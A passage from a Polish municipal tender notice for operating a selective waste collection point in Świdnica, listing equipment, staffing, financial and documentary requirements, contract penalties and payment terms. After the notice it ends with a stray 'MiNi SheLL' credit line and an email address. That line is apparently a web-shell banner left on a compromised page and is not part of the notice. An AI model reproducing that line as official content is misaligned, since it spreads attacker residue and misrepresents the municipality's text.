- pojemnikiem na odpady niebezpieczne, chemiczne - minimum 2 szt.;
- pojemnikiem na odpady zawierające rtęć - minimum 1szt.;
- pojemnikiem na zużyte baterie - minimum 1 szt.;
- pojemnikiem na zużyte akumulatory - minimum 1szt.;
- pojemnikiem kontenerowym magazynowym zamkniętym do gromadzenia
odpadów zużytego sprzętu elektrycznego i elektronicznego - minimum
1szt.; jeśli wykonawca posiada pomieszczenie magazynowe, w którym
możliwe jest zbieranie, gromadzenie i przechowywanie zużytego sprzętu
elektrycznego i elektronicznego nie jest konieczne posiadanie pojemnika
temu służącego.
- pojemnikiem kontenerowym magazynowym zamkniętym do gromadzenia
odpadów wielkogabarytowych, bądź zadaszonym boksem - minimum
1szt.;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia,
tzn.:
- minimum 1 osobą nadzoru, odpowiedzialną za właściwą jakość
świadczonej usługi i sprawozdawczość, posiadającą co najmniej
wykształcenie średnie oraz minimum roczne doświadczenie w pracy na
stanowisku związanym z gospodarką odpadami komunalnymi;
- minimum 1 osobą, zatrudnioną na stanowisku obsługi PSZOK, posiadającą
co najmniej wykształcenie zawodowe oraz przeszkoloną w zakresie
gospodarki odpadami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że:
a) posiada środki finansowe lub zdolność kredytową na kwotę minimum
100 000,00 zł,
b) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej
działalności gospodarczej związanej z przedmiotem zamówienia w wysokości
nie niższej niż 100 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- kopia dokumentu potwierdzającego dysponowanie nieruchomością, na której
będzie prowadzony PSZOK.
a) parafowany projekt umowy - załącznik nr 11 do SIWZ,
b) dowód wniesienia wadium,
c) wykaz części zamówienia, które Wykonawca zamierza powierzyć
podwykonawcom - wzór wykazu stanowi załącznik nr 12 do SIWZ,
d) pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to
osoba upoważniona do reprezentowania Wykonawcy z mocy prawa,
e) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia
(konsorcjum, spółka cywilna) pełnomocnictwo do reprezentowania ich
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, zgodnie
z art. 23 ust. 2 ustawy Prawo zamówień publicznych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>XX. ISTOTNE DLA STRON POSTANOWIENIA UMOWY
1. Zamawiający wymaga od Wykonawcy, aby zawarł z nim umowę w sprawie zamówienia
publicznego na takich warunkach, jak w projekcie umowy, który stanowi załącznik Nr 10 do SIWZ.
2. Zamawiający przewiduje zmiany umowy w formie pisemnej, aneksem zaakceptowanym przez obie strony, w przypadku wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności:
1) zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy,
2) wystąpienia urzędowej zmiany stawki podatku VAT po dacie zawarcia umowy,
3) niezależnych od stron zmian organizacyjnych, dotyczących osób kluczowych
dla realizacji przedmiotu umowy,
4) z powodu siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez
czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności
zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego
powstaniem szkody w znacznych rozmiarach.
3. Zamawiającemu przysługuje prawo do odstąpienia od umowy w przypadku:
a) zaprzestania działalności przez Wykonawcę - w terminie 3 dni od dnia otrzymania
informacji o zaprzestaniu działalności,
b) nie rozpoczęcia przez Wykonawcę prowadzenia Punktu Selektywnego Zbierania
odpadów w ciągu 3 dni od dnia określonego w §2 umowy, braku prowadzenia
PSZOK bez uzasadnionych przyczyn pomimo wezwania Zamawiającego - po
upływie 2 dni od dnia wezwania do rozpoczęcia lub kontynuowania usługi,
c) braku właściwej jakości usług świadczonych przez Wykonawcę, tj. niezgodnej ze
SIWZ oraz ofertą Wykonawcy, pomimo dwukrotnego wezwania do poprawy
jakości usług złożonego na piśmie przez Zamawiającego - po upływie 7 dni od dnia
drugiego wezwania do poprawy jakości usług.
d) braku ważnej polisy ubezpieczeniowej lub innego dokumentu potwierdzającego,
że Wykonawca jest ubezpieczony w zakresie prowadzonej działalności,
e) innych istotnych okoliczności, powodujących, że wykonanie umowy nie leży w
interesie publicznym, czego nie można było przewidzieć w chwili zawarcia
umowy.
4. Kary umowne, jakie zapłaci Wykonawca Zamawiającemu:
a) za opóźnienia w uruchomieniu Punktu Selektywnego Zbierania Odpadów z dniem
1 lipca 2013r. - w wysokości 1% wysokości wynagrodzenia, o którym mowa w §9
ust. 1 za każdy dzień zwłoki,
b) za odstąpienie od umowy - w wysokości 10% wysokości wynagrodzenia,
o którym mowa w §9 ust. 1 umowy;
c) za nie zapewnienie w ramach świadczenia usługi zadeklarowanej w ofercie
wymaganego sprawnego sprzętu lub pojemników na odpady - w wysokości
1000,00 zł - za każdą brakującą jednostkę sprzętu za dzień,
d) za nie przestrzeganie czasu otwarcia PSZOK - w wysokości 1000,0 zł za każdy
stwierdzony przypadek;
e) za brak wyposażenia terenu PSZOK zgodnie z wymaganiami ujętymi w SIWZ -
500,00 zł za każde uchybienie;
f) za niedopełnienie innych wymagań określonych w §3 ust. 2 umowy - 500,0 zł za
każde uchybienie;
g) za nieprawidłowości związane z rodzajem lub ilością oraz sposobem
przyjmowania odpadów do PSZOK - 500,00 zł za każdy stwierdzony przypadek;
h) za brak czystości i porządku, właściwego magazynowania odpadów na terenie
PSZOK - 500,00 zł za każdy stwierdzony przypadek;
i) za postępowanie ze zgromadzonymi odpadami w sposób niezgodny z rozdziałem
V, pkt 2 SIWZ - 1000,00 zł za każdą tonę odpadów;
j) za nierzetelne prowadzenie ewidencji wskazanych w §3 ust. 3- 100,0 zł za każdy
stwierdzony przypadek.
5. Kary umowne, jakie Zamawiający Wykonawcy:
a) za odstąpienie od umowy z winy Zamawiającego - w wysokości 5% wysokości
wynagrodzenia, o którym mowa w §9 ust. 1 umowy;
b) gdy Zamawiający nie wywiązuje się z obowiązku zapłaty wynagrodzenia za
należycie wykonaną usługę po upływie 60 dni od terminu wyznaczonego na
zapłatę, pomimo pisemnego wezwania do zapłaty złożonego przez Wykonawcę;
c) gdy Zamawiający wymaga od Wykonawcy wykonania czynności niezgodnych z
przepisami prawa, pomimo pisemnego poinformowania przez Wykonawcę, że
wykonanie czynności jest niezgodne z przepisami prawa- po upływie 30 dni od
dnia złożenia informacji, pod warunkiem, że Zamawiający nie odstąpił od żądania
wykonania czynności niezgodnych z przepisami prawa.
6. Warunki płatności:
a) za wykonanie przedmiotu umowy Wykonawca otrzyma wynagrodzenie
zryczałtowane miesięczne, wypłacane w 24 równych ratach;
b) termin płatności wynosi 30 dni od daty otrzymania faktury przez Zamawiającego;
c) faktury winny być wystawiane na Gminę Miasto Świdnica, ul. Armii Krajowej 49,
58-100 Świdnica NIP 884-00-24-797;
d) Zamawiający upoważnia Wykonawcę do wystawiania faktur bez podpisu
Zamawiającego;
e) wynagrodzenie ulegnie proporcjonalne zmianie, jeżeli ilość odpadów
przyjmowanych do PSZOK ulegnie zwiększeniu lub zmniejszeniu ( 10% w skali
roku);
f) w przypadku zmiany ilości odpadów zebranych w ciągu roku strony dopuszczają
zmianę wynagrodzenia za świadczone usługi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2013 godzina 09:00, miejsce: Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com